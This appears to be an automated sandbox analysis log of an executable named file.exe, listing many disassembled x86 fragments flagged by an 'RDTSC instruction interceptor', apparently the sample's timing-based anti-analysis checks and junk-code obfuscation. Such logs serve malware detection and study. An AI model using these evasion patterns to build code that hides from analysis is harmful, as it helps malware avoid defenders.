Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F48C second address: 116F510 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FBF08D33351h 0x0000000d nop 0x0000000e mov edi, eax 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1F21h], eax 0x00000018 sub dword ptr [ebp+122D1C1Ch], eax 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FBF08D33348h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c je 00007FBF08D33355h 0x00000042 jmp 00007FBF08D3334Fh 0x00000047 pushad 0x00000048 push edx 0x00000049 pop edx 0x0000004a jmp 00007FBF08D3334Fh 0x0000004f popad 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 jng 00007FBF08D33346h 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 0x00000060 pop esi 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F260 second address: 116F266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F266 second address: 116F26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170026 second address: 117002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117002A second address: 1170090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jne 00007FBF08D3335Eh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FBF08D33348h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov si, di 0x00000030 xchg eax, ebx 0x00000031 push ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FBF08D33354h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FDCE second address: 116FDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170AC6 second address: 1170ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170ACA second address: 1170AD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170AD0 second address: 1170AD5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170887 second address: 117088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171574 second address: 1171579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171579 second address: 1171583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBF09325AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171CF0 second address: 1171D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF08D3334Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171D01 second address: 1171D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171D05 second address: 1171D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FBF08D33352h 0x0000000f jo 00007FBF08D3334Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117568F second address: 1175693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1175693 second address: 1175699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1175D76 second address: 1175D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF09325ABAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1175D85 second address: 1175D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FBF08D33348h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11727C3 second address: 11727CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF09325AB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176CAD second address: 1176CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176CB1 second address: 1176CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1178E2A second address: 1178E4A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF08D33352h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c jc 00007FBF08D3334Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11790A1 second address: 11790A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11790A5 second address: 11790B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117AF96 second address: 117AFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FBF09325AC4h 0x00000010 jmp 00007FBF09325ABCh 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 add dword ptr [ebp+1244FB0Eh], eax 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FBF09325AB8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jmp 00007FBF09325ABCh 0x0000003f xchg eax, esi 0x00000040 push ecx 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 pop ebx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117AFFE second address: 117B002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BE39 second address: 117BE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FBF09325ACFh 0x0000000c jmp 00007FBF09325AC9h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jng 00007FBF09325AB6h 0x0000001b jno 00007FBF09325AB6h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BE73 second address: 117BE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BE77 second address: 117BE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CDFF second address: 117CE60 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF08D33348h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d stc 0x0000000e xor ebx, 7376B567h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FBF08D33348h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push esi 0x00000031 sub edi, dword ptr [ebp+122D2BF9h] 0x00000037 pop edi 0x00000038 push 00000000h 0x0000003a or edi, dword ptr [ebp+122D29B1h] 0x00000040 xchg eax, esi 0x00000041 jmp 00007FBF08D3334Dh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jnl 00007FBF08D3334Ch 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117C01A second address: 117C024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBF09325AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F4A0 second address: 117F4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F4A4 second address: 117F4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180431 second address: 1180435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180435 second address: 118043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181415 second address: 1181419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181419 second address: 1181429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118243A second address: 1182440 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11824E7 second address: 11824F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF09325ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181595 second address: 1181599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184479 second address: 118447D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182694 second address: 118271A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FBF08D33348h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FBF08D33348h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 sub dword ptr [ebp+122D223Fh], esi 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 mov dword ptr [ebp+122D3148h], ebx 0x00000059 mov eax, dword ptr [ebp+122D020Dh] 0x0000005f mov edi, dword ptr [ebp+122D2B45h] 0x00000065 push FFFFFFFFh 0x00000067 mov dword ptr [ebp+124505F8h], edi 0x0000006d nop 0x0000006e push ecx 0x0000006f jnp 00007FBF08D3334Ch 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118447D second address: 11844E6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF09325AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007FBF09325AC4h 0x00000012 nop 0x00000013 mov di, DEB7h 0x00000017 or bx, 6E31h 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D2A2Dh] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FBF09325AB8h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jmp 00007FBF09325AC2h 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a pop eax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11844E6 second address: 11844F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11853D5 second address: 11853D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11853D9 second address: 118543D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FBF08D33346h 0x0000000f jng 00007FBF08D33346h 0x00000015 popad 0x00000016 pop eax 0x00000017 nop 0x00000018 pushad 0x00000019 pushad 0x0000001a mov edx, dword ptr [ebp+122D2B59h] 0x00000020 add cx, 9516h 0x00000025 popad 0x00000026 or esi, dword ptr [ebp+122D2BD9h] 0x0000002c popad 0x0000002d add ebx, 7B7FEC36h 0x00000033 push 00000000h 0x00000035 call 00007FBF08D3334Fh 0x0000003a movzx edi, dx 0x0000003d pop ebx 0x0000003e push 00000000h 0x00000040 mov ebx, dword ptr [ebp+122D28B1h] 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push edi 0x0000004b pop edi 0x0000004c jmp 00007FBF08D3334Dh 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11867B4 second address: 11867B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11867B9 second address: 1186845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a cld 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov edi, dword ptr [ebp+122D2985h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FBF08D33348h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 pushad 0x0000003a sub dword ptr [ebp+122D1CD6h], eax 0x00000040 jg 00007FBF08D3334Ch 0x00000046 add eax, dword ptr [ebp+122D2576h] 0x0000004c popad 0x0000004d mov eax, dword ptr [ebp+122D0B6Dh] 0x00000053 movzx edi, si 0x00000056 push FFFFFFFFh 0x00000058 mov dword ptr [ebp+122D25BFh], ecx 0x0000005e nop 0x0000005f pushad 0x00000060 jmp 00007FBF08D33354h 0x00000065 jng 00007FBF08D3334Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11904EE second address: 1190505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FBF09325AB6h 0x0000000e popad 0x0000000f jp 00007FBF09325ABCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FF02 second address: 118FF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190047 second address: 119007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF09325AC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBF09325AC1h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194F05 second address: 1194F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199F6E second address: 1199F7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199F7A second address: 1199F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119A516 second address: 119A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF09325ABAh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FBF09325AB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119A52D second address: 119A531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119A8FF second address: 119A908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119A908 second address: 119A90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119A90C second address: 119A924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A0D7C second address: 11A0D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A0D92 second address: 11A0D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A64F7 second address: 11A64FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5284 second address: 11A5296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 js 00007FBF09325AB6h 0x0000000b jp 00007FBF09325AB6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A61F5 second address: 11A61F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AD047 second address: 11AD04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB9B2 second address: 11AB9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB9B8 second address: 11AB9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB9BC second address: 11ABA14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF08D33358h 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 jbe 00007FBF08D33346h 0x00000017 pop esi 0x00000018 jmp 00007FBF08D3334Ah 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FBF08D33346h 0x00000027 jmp 00007FBF08D33351h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ABDF7 second address: 11ABE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBF09325ABBh 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ABE0A second address: 11ABE12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ABE12 second address: 11ABE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBF09325AB6h 0x0000000a jmp 00007FBF09325AC9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ABF8C second address: 11ABF97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBF08D33346h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ABF97 second address: 11ABF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC3C2 second address: 11AC3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF08D33356h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC3DC second address: 11AC3E6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF09325AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC5C3 second address: 11AC5D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC5D5 second address: 11AC5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC5DB second address: 11AC5E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC71D second address: 11AC725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ACA48 second address: 11ACA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB65C second address: 11AB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113228B second address: 1132295 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF08D33346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1610 second address: 11B1614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
